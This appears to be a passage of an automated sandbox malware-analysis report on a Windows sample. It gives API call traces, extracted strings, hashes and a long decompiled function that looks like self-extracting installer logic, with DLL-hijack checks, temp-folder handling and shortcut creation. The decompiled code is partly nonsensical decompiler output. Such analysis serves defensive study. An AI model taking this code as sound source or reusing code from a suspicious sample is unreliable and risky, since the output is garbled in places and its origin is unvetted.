GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C7088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C708BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C70B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C70B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C70B93
ReadFile.KERNEL32(00000000,?,00007FFE,00C93C7C,00000000), ref: 00C70BB1
CloseHandle.KERNEL32(00000000), ref: 00C70C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C70C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00C93C7C,?,00000000,?,00000800), ref: 00C70C72
GetFileAttributesW.KERNELBASE(?,?,00C93C7C,00000800,?,00000000,?,00000800), ref: 00C70C9C
GetFileAttributesW.KERNEL32(?,?,00C93D44,00000800), ref: 00C70CD8

Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858

_swprintf.LIBCMT ref: 00C70D4A
_swprintf.LIBCMT ref: 00C70D96

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

AllocConsole.KERNEL32 ref: 00C70D9E
GetCurrentProcessId.KERNEL32 ref: 00C70DA8
AttachConsole.KERNEL32(00000000), ref: 00C70DAF
_wcslen.LIBCMT ref: 00C70DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00C70DD5
WriteConsoleW.KERNEL32(00000000), ref: 00C70DDC
Sleep.KERNEL32(00002710), ref: 00C70DE7
FreeConsole.KERNEL32 ref: 00C70DED
ExitProcess.KERNEL32 ref: 00C70DF5

Strings

dwmapi.dll, xrefs: 00C70927, 00C70D0D
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00C70D84
kernel32, xrefs: 00C70873
SetDllDirectoryW, xrefs: 00C70888
DXGIDebug.dll, xrefs: 00C708FC, 00C70C5E
uxtheme.dll, xrefs: 00C70D17
SetDefaultDllDirectories, xrefs: 00C708B9

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 5b75a83a8a442855e988cc80c141ed90dac53f65669717c0c732366f9bd5e491
Instruction ID: 0b907d0391d9a67eb5cc09a5f1f1fc91d5dc5724a418fb2165caa00d6fe7981b
Opcode Fuzzy Hash: 5b75a83a8a442855e988cc80c141ed90dac53f65669717c0c732366f9bd5e491
Instruction Fuzzy Hash: 3DD13FF10083C4ABDF359F50C88DB9FBBE8BB85704F50491DF59996250DBB09A49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00C7C73F(void* __edx, void* __edi) {
				intOrPtr _t232;
				void* _t237;
				intOrPtr _t293;
				intOrPtr _t297;
				long _t308;
				void* _t311;
				signed int _t312;
				void* _t316;

				E00C7EB78(0xc92b20, _t316);
				_t232 = E00C7EC50(0x1b888);
				if( *((intOrPtr*)(_t316 + 0xc)) == 0) {
					L180:
					 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
					return _t232;
				}
				_push(0x1000);
				_push(_t316 - 0x15);
				_push(_t316 - 0xd);
				_push(_t316 - 0x588c);
				_push(_t316 - 0xf894);
				_push( *((intOrPtr*)(_t316 + 0xc)));
				_t232 = E00C7B314(__edi, _t316);
				_t297 = _t232;
				 *((intOrPtr*)(_t316 + 0xc)) = _t297;
				if(_t297 != 0) {
					_t293 =  *((intOrPtr*)(_t316 + 0x10));
					_push(__edi);
					do {
						_t237 = _t316 - 0x588c;
						_t311 = _t316 - 0x1b894;
						_t308 = 6;
						goto L4;
						L6:
						while(E00C71FBB(_t316 - 0xf894,  *((intOrPtr*)(0xc9e744 + _t312 * 4))) != 0) {
							_t312 = _t312 + 1;
							if(_t312 < 0xe) {
								continue;
							} else {
								goto L178;
							}
						}
						if(_t312 > 0xd) {
							goto L178;
						}
						switch( *((intOrPtr*)(_t312 * 4 +  &M00C7D41B))) {
							case 0:
								__eflags = _t293 - 2;
								if(_t293 == 2) {
									_t308 = 0x800;
									E00C7A64D(_t316 - 0x788c, 0x800);
									E00C6A544(E00C6BDF3(__eflags, _t316 - 0x788c, _t316 - 0x588c, _t316 - 0xd894, 0x800), _t293, _t316 - 0x8894, _t312);
									 *(_t316 - 4) = 0;
									E00C6A67E(_t316 - 0x8894, _t316 - 0xd894);
									E00C66EDB(_t316 - 0x388c);
									while(1) {
										_push(0);
										_t255 = E00C6A5D1(_t316 - 0x8894, _t316 - 0x388c);
										__eflags = _t255;
										if(_t255 == 0) {
											break;
										}
										SetFileAttributesW(_t316 - 0x388c, 0);
										__eflags =  *(_t316 - 0x2880);
										if(__eflags == 0) {
											L18:
											_t259 = GetFileAttributesW(_t316 - 0x388c);
											__eflags = _t259 - 0xffffffff;
											if(_t259 == 0xffffffff) {
												continue;
											}
											_t261 = DeleteFileW(_t316 - 0x388c);
											__eflags = _t261;
											if(_t261 != 0) {
												continue;
											} else {
												_t314 = 0;
												_push(0);
												goto L22;
												L22:
												E00C64092(_t316 - 0x1044, _t308, L"%s.%d.tmp", _t316 - 0x388c);
												_t318 = _t318 + 0x14;
												_t266 = GetFileAttributesW(_t316 - 0x1044);
												__eflags = _t266 - 0xffffffff;
												if(_t266 != 0xffffffff) {
													_t314 = _t314 + 1;
													__eflags = _t314;
													_push(_t314);
													goto L22;
												} else {
													_t269 = MoveFileW(_t316 - 0x388c, _t316 - 0x1044);
													__eflags = _t269;
													if(_t269 != 0) {
														MoveFileExW(_t316 - 0x1044, 0, 4);
													}
													continue;
												}
											}
										}
										E00C6B991(__eflags, _t316 - 0x788c, _t316 - 0x1044, _t308);
										E00C6B690(__eflags, _t316 - 0x1044, _t308);
										_t315 = E00C83E13(_t316 - 0x788c);
										__eflags = _t315 - 4;
										if(_t315 < 4) {
											L16:
											_t280 = E00C6BDB4(_t316 - 0x588c);
											__eflags = _t280;
											if(_t280 != 0) {
												break;
											}
											L17:
											_t283 = E00C83E13(_t316 - 0x388c);
											__eflags = 0;
											 *((short*)(_t316 + _t283 * 2 - 0x388a)) = 0;
											E00C7FFF0(_t308, _t316 - 0x44, 0, 0x1e);
											_t318 = _t318 + 0x10;
											 *((intOrPtr*)(_t316 - 0x40)) = 3;
											_push(0x14);
											_pop(_t286);
											 *((short*)(_t316 - 0x34)) = _t286;
											 *((intOrPtr*)(_t316 - 0x3c)) = _t316 - 0x388c;
											_push(_t316 - 0x44);
											 *0xcc307c();
											goto L18;
										}
										_t291 = E00C83E13(_t316 - 0x1044);
										__eflags = _t315 - _t291;
										if(_t315 > _t291) {
											goto L17;
										}
										goto L16;
									}
									 *(_t316 - 4) =  *(_t316 - 4) | 0xffffffff;
									E00C6A55A(_t316 - 0x8894);
								}
								goto L178;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00C83E13(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xcbfc94);
									__eax = E00C83E3E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										__eax = E00C87686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00C83E2E(__esi);
									}
								}
								goto L178;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
								}
								goto L178;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L178;
								}
								__eflags =  *0xcaa472 - __di;
								if( *0xcaa472 != __di) {
									goto L178;
								}
								__eax = 0;
								__edi = __ebp - 0x588c;
								_push(0x22);
								 *(__ebp - 0x1044) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x588c) - __ax;
								if( *(__ebp - 0x588c) == __ax) {
									__edi = __ebp - 0x588a;
								}
								__eax = E00C83E13(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L178;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1044 = E00C70602(__ebp - 0x1044, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1044;
											__eax = E00C8279B(__ebp - 0x1044, __ebp - 0x1044);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1044;
											__edi = 0xcaa472;
											E00C70602(0xcaa472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
											__eax = E00C7B1BE(__ebp - 0x1044, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xcaa472); // executed
											__eax = __ebp - 0x1044;
											__eax = E00C83E49(__ebp - 0x1044, 0xcaa472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
											}
											goto L178;
										}
										L53:
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xcc3028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1044;
												_push(__ebp - 0x1044);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0xcc3024();
												_push( *(__ebp - 0x1c));
												 *0xcc3008() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1044) = __cx;
											}
											__eflags =  *(__ebp - 0x1044) - __bx;
											if( *(__ebp - 0x1044) != __bx) {
												__eax = __ebp - 0x1044;
												__eax = E00C83E13(__ebp - 0x1044);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1044 = E00C705DA(__eflags, __ebp - 0x1044, "\\", __esi);
												}
											}
											__esi = E00C83E13(__edi);
											__eax = __ebp - 0x1044;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1044 = E00C705DA(__eflags, __ebp - 0x1044, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L53;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L178;
									} else {
										__ebp - 0x1044 = E00C70602(__ebp - 0x1044, __edi, 0x800);
										goto L65;
									}
								}
							case 4:
								__eflags =  *0xcaa46c - 1;
								__eflags = __eax - 0xcaa46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__edx + 7) & __al;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0xca8457 = __cl;
									 *0xca8460 = 1;
									goto L178;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xca8457 = __cl;
									L81:
									 *0xca8460 = __cl;
									goto L178;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L178;
								}
								 *0xca8457 = 1;
								goto L81;
							case 6:
								__edi = 0;
								 *0xcac577 = 1;
								__edi = 1;
								__eax = __ebp - 0x588c;
								__eflags =  *(__ebp - 0x588c) - 0x3c;
								__ebx = __esi;
								 *(__ebp - 0x14) = __eax;
								if( *(__ebp - 0x588c) != 0x3c) {
									L99:
									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
										if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
											goto L178;
										}
										__eflags = __ebx - 6;
										if(__ebx != 6) {
											goto L178;
										}
										__ecx = 0;
										__eflags = 0;
										_push(0);
										L105:
										_push(__edi);
										_push(__eax);
										_push( *(__ebp + 8));
										__eax = E00C7D78F(__ebp);
										goto L178;
									}
									__eflags = __ebx - 9;
									if(__ebx != 9) {
										goto L178;
									}
									_push(1);
									goto L105;
								}
								__eax = __ebp - 0x588a;
								_push(0x3e);
								_push(__ebp - 0x588a);
								__eax = E00C822C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									L98:
									__eax =  *(__ebp - 0x14);
									goto L99;
								}
								_t111 = __eax + 2; // 0x2
								__ecx = _t111;
								 *(__ebp - 0x14) = _t111;
								__ecx = 0;
								 *__eax = __cx;
								__eax = __ebp - 0x10c;
								_push(0x64);
								_push(__ebp - 0x10c);
								__eax = __ebp - 0x588a;
								_push(__ebp - 0x588a);
								__eax = E00C7AF98();
								 *(__ebp - 0x20) = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									goto L98;
								}
								__esi = __eax;
								while(1) {
									__eflags =  *(__ebp - 0x10c);
									if( *(__ebp - 0x10c) == 0) {
										goto L98;
									}
									__eax = __ebp - 0x10c;
									__eax = E00C71FBB(__ebp - 0x10c, L"HIDE");
									__eax =  ~__eax;
									asm("sbb eax, eax");
									__edi = __edi & __eax;
									__eax = __ebp - 0x10c;
									__eax = E00C71FBB(__ebp - 0x10c, L"MAX");
									__eflags = __eax;
									if(__eax == 0) {
										_push(3);
										_pop(__edi);
									}
									__eax = __ebp - 0x10c;
									__eax = E00C71FBB(__ebp - 0x10c, L"MIN");
									__eflags = __eax;
									if(__eax == 0) {
										_push(6);
										_pop(__edi);
									}
									_push(0x64);
									__eax = __ebp - 0x10c;
									_push(__ebp - 0x10c);
									_push(__esi);
									__esi = E00C7AF98();
									__eflags = __esi;
									if(__esi != 0) {
										continue;
									} else {
										goto L98;
									}
								}
								goto L98;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xcaa46c - __edi;
										if( *0xcaa46c == __edi) {
											 *0xcaa46c = 2;
										}
										 *0xca9468 = 1;
									}
									goto L178;
								}
								__eax = __ebp - 0x788c;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
								__eax = E00C6B690(__eflags, __ebp - 0x788c, 0x800);
								__ebx = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xc9e724);
									__ebp - 0x788c = E00C64092(0xca946a, __edi, L"%s%s%u", __ebp - 0x788c);
									__eax = E00C6A231(0xca946a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xca946a);
								__eflags =  *(__ebp - 0x588c) - __bx;
								if( *(__ebp - 0x588c) == __bx) {
									goto L178;
								}
								__eflags =  *0xcac575 - __bl;
								if( *0xcac575 != __bl) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x444) = __ax;
								__eax = __ebp - 0x588c;
								_push(0x2c);
								_push(__ebp - 0x588c);
								__eax = E00C822C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L122:
									__eflags =  *(__ebp - 0x444) - __bx;
									if( *(__ebp - 0x444) == __bx) {
										__ebp - 0x1b894 = __ebp - 0x588c;
										E00C70602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
										__ebp - 0x444 = E00C70602(__ebp - 0x444, __ebp - 0x19894, 0x200);
									}
									__ebp - 0x588c = E00C7ADD2(__ebp - 0x588c);
									__eax = 0;
									 *(__ebp - 0x488c) = __ax;
									__ebp - 0x444 = __ebp - 0x588c;
									__eax = E00C7A7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
									__eflags = __eax - 6;
									if(__eax != 6) {
										__eax = 0;
										 *0xca8454 = 1;
										 *0xca946a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
									}
									goto L178;
								}
								__ax =  *(__ebp - 0x588c);
								__esi = __ebx;
								__eflags = __ax;
								if(__ax == 0) {
									goto L122;
								}
								__ecx = __ax & 0x0000ffff;
								while(1) {
									__eflags = __cx - 0x40;
									if(__cx == 0x40) {
										break;
									}
									__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
									__esi =  &(__esi->i);
									__ecx = __eax;
									__eflags = __ax;
									if(__ax != 0) {
										continue;
									}
									goto L122;
								}
								__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
								__ebp - 0x444 = E00C70602(__ebp - 0x444, __ebp - 0x444, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x588c) = __ax;
								goto L122;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x588c) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x588c;
										_push(__ebp - 0x588c);
										__eax = E00C87625(__ebx, __edi);
										_pop(__ecx);
										 *0xcbfc9c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xcbfc98 = E00C7B48E(__ecx, __edx, __eflags);
								}
								 *0xcac576 = 1;
								goto L178;
							case 9:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x2844) = __ax;
								__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
								__eax = E00C879E9( *(__ebp - 0x1b894) & 0x0000ffff);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									 *(__ebp - 0x14) = 2;
									__eax = 0xcbcb82;
								} else {
									__eflags = __eax - 0x54;
									if(__eax == 0x54) {
										 *(__ebp - 0x14) = 7;
										__eax = 0xcbbb82;
									} else {
										 *(__ebp - 0x14) = 0x10;
										__eax = 0xcbdb82;
									}
								}
								__esi = 0x800;
								__ebp - 0x2844 = E00C70602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
								__eax = 0;
								 *(__ebp - 0x9894) = __ax;
								 *(__ebp - 0x1844) = __ax;
								__ebp - 0x19894 = __ebp - 0x688c;
								__eax = E00C70602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x688c) - __bx;
								if( *(__ebp - 0x688c) != __bx) {
									__ebp - 0x688c = E00C6A231(__ebp - 0x688c);
									__eflags = __al;
									if(__al != 0) {
										goto L163;
									}
									__ax =  *(__ebp - 0x688c);
									__esi = __ebp - 0x688c;
									__ebx = __edi;
									__eflags = __ax;
									if(__ax == 0) {
										__esi = 0x800;
										goto L163;
									}
									__edi = __ax & 0x0000ffff;
									do {
										_push(0x20);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di == __ax) {
											L149:
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x688c = E00C6A231(__ebp - 0x688c);
											__eflags = __al;
											if(__al == 0) {
												L158:
												__esi->i = __di;
												goto L159;
											}
											__ebp - 0x688c = E00C6A243(__ebp - 0x688c);
											__eax = E00C6A28F(__eax);
											__eflags = __al;
											if(__al != 0) {
												goto L158;
											}
											_push(0x2f);
											_pop(__ecx);
											__eax =  &(__esi->i);
											__ebx = __esi;
											__eflags = __di - __cx;
											if(__di != __cx) {
												_push(0x20);
												__esi = __eax;
												_pop(__eax);
												while(1) {
													__eflags = __esi->i - __ax;
													if(__esi->i != __ax) {
														break;
													}
													__esi =  &(__esi->i);
													__eflags = __esi;
												}
												__ecx = __ebp - 0x1844;
												__eax = __esi;
												__edx = 0x400;
												L157:
												__eax = E00C70602(__ecx, __eax, __edx);
												 *__ebx = __di;
												goto L159;
											}
											 *(__ebp - 0x1844) = __cx;
											__edx = 0x3ff;
											__ecx = __ebp - 0x1842;
											goto L157;
										}
										_push(0x2f);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di != __ax) {
											goto L159;
										}
										goto L149;
										L159:
										__esi =  &(__esi->i);
										__eax = __esi->i & 0x0000ffff;
										__edi = __esi->i & 0x0000ffff;
										__eflags = __ax;
									} while (__ax != 0);
									__esi = 0x800;
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										 *__ebx = __ax;
									}
									goto L163;
								} else {
									__ebp - 0x19892 = __ebp - 0x688c;
									E00C70602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
									_push(__ebx);
									_push(__ebp - 0x688a);
									__eax = E00C822C6(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1844 = E00C70602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
									}
									L163:
									__eflags =  *((short*)(__ebp - 0x11894));
									if( *((short*)(__ebp - 0x11894)) != 0) {
										__ebp - 0x9894 = __ebp - 0x11894;
										__eax = E00C6B6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
									}
									__ebp - 0xb894 = __ebp - 0x688c;
									__eax = E00C6B6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
									__eflags =  *(__ebp - 0x2844);
									if(__eflags == 0) {
										__ebp - 0x2844 = E00C7B425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
									}
									__ebp - 0x2844 = E00C6B690(__eflags, __ebp - 0x2844, __esi);
									__eflags =  *((short*)(__ebp - 0x17894));
									if(__eflags != 0) {
										__ebp - 0x17894 = __ebp - 0x2844;
										E00C705DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
										__eax = E00C6B690(__eflags, __ebp - 0x2844, __esi);
									}
									__ebp - 0x2844 = __ebp - 0xc894;
									__eax = E00C70602(__ebp - 0xc894, __ebp - 0x2844, __esi);
									__eflags =  *(__ebp - 0x13894);
									__eax = __ebp - 0x13894;
									if(__eflags == 0) {
										__eax = __ebp - 0x19894;
									}
									__ebp - 0x2844 = E00C705DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
									__eax = __ebp - 0x2844;
									__eflags = E00C6B92D(__ebp - 0x2844);
									if(__eflags == 0) {
										L173:
										__ebp - 0x2844 = E00C705DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
										goto L174;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L174:
											__ebx = 0;
											__ebp - 0x2844 = E00C6A0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
											__ebp - 0xb894 = __ebp - 0xa894;
											E00C70602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
											__eax = E00C6C2E4(__eflags, __ebp - 0xa894);
											__esi =  *(__ebp - 0x1844) & 0x0000ffff;
											__eax = __ebp - 0x1844;
											__edx =  *(__ebp - 0x9894) & 0x0000ffff;
											__edi = __ebp - 0xa894;
											__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
											asm("sbb esi, esi");
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
											__eax = __ebp - 0x9894;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
											__eax = __ebp - 0x15894;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
											 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
											asm("sbb eax, eax");
											 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
											__ebp - 0xb894 = E00C7A48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
											__eflags =  *(__ebp - 0xc894) - __bx;
											if( *(__ebp - 0xc894) != __bx) {
												_push(0);
												__eax = __ebp - 0xc894;
												_push(__ebp - 0xc894);
												_push(5);
												_push(0x1000);
												__eax =  *0xcc308c();
											}
											goto L178;
										}
										goto L173;
									}
								}
							case 0xa:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xcaa470 = 1;
								}
								goto L178;
							case 0xb:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eax = E00C879E9( *(__ebp - 0x588c) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xca8461 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xca8462 = 1;
									} else {
										__eax = 0;
										 *0xca8461 = __al;
										 *0xca8462 = __al;
									}
								}
								goto L178;
							case 0xc:
								 *0xcb7b7a = 1;
								__eax = __eax + 0xcb7b7a;
								_t125 = __esi + 0x39;
								 *_t125 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t125;
								__ebp = 0xffffa774;
								if( *_t125 != 0) {
									_t127 = __ebp - 0x588c; // 0xffff4ee8
									__eax = _t127;
									 *0xc9e728 = E00C71FA7(_t127);
								}
								goto L178;
						}
						L4:
						_push(0x1000);
						_push(_t311);
						_push(_t237);
						_t237 = E00C7AF98();
						_t311 = _t311 + 0x2000;
						_t308 = _t308 - 1;
						if(_t308 != 0) {
							goto L4;
						} else {
							_t312 = _t308;
							goto L6;
						}
						L178:
						_push(0x1000);
						_t221 = _t316 - 0x15; // 0xffffa75f
						_t222 = _t316 - 0xd; // 0xffffa767
						_t223 = _t316 - 0x588c; // 0xffff4ee8
						_t224 = _t316 - 0xf894; // 0xfffeaee0
						_push( *((intOrPtr*)(_t316 + 0xc)));
						_t232 = E00C7B314(_t308, _t316);
						_t293 =  *((intOrPtr*)(_t316 + 0x10));
						 *((intOrPtr*)(_t316 + 0xc)) = _t232;
					} while (_t232 != 0);
				}
			}

0x00c7c744
0x00c7c74e
0x00c7c757
0x00c7d40d
0x00c7d410
0x00c7d418
0x00c7d418
0x00c7c75d
0x00c7c765
0x00c7c769
0x00c7c770
0x00c7c777
0x00c7c778
0x00c7c77b
0x00c7c780
0x00c7c782
0x00c7c787
0x00c7c78e
0x00c7c792
0x00c7c793
0x00c7c795
0x00c7c79b
0x00c7c7a1
0x00c7c7a1
0x00000000
0x00c7c7bb
0x00c7c7d2
0x00c7c7d6
0x00000000
0x00c7c7d8
0x00000000
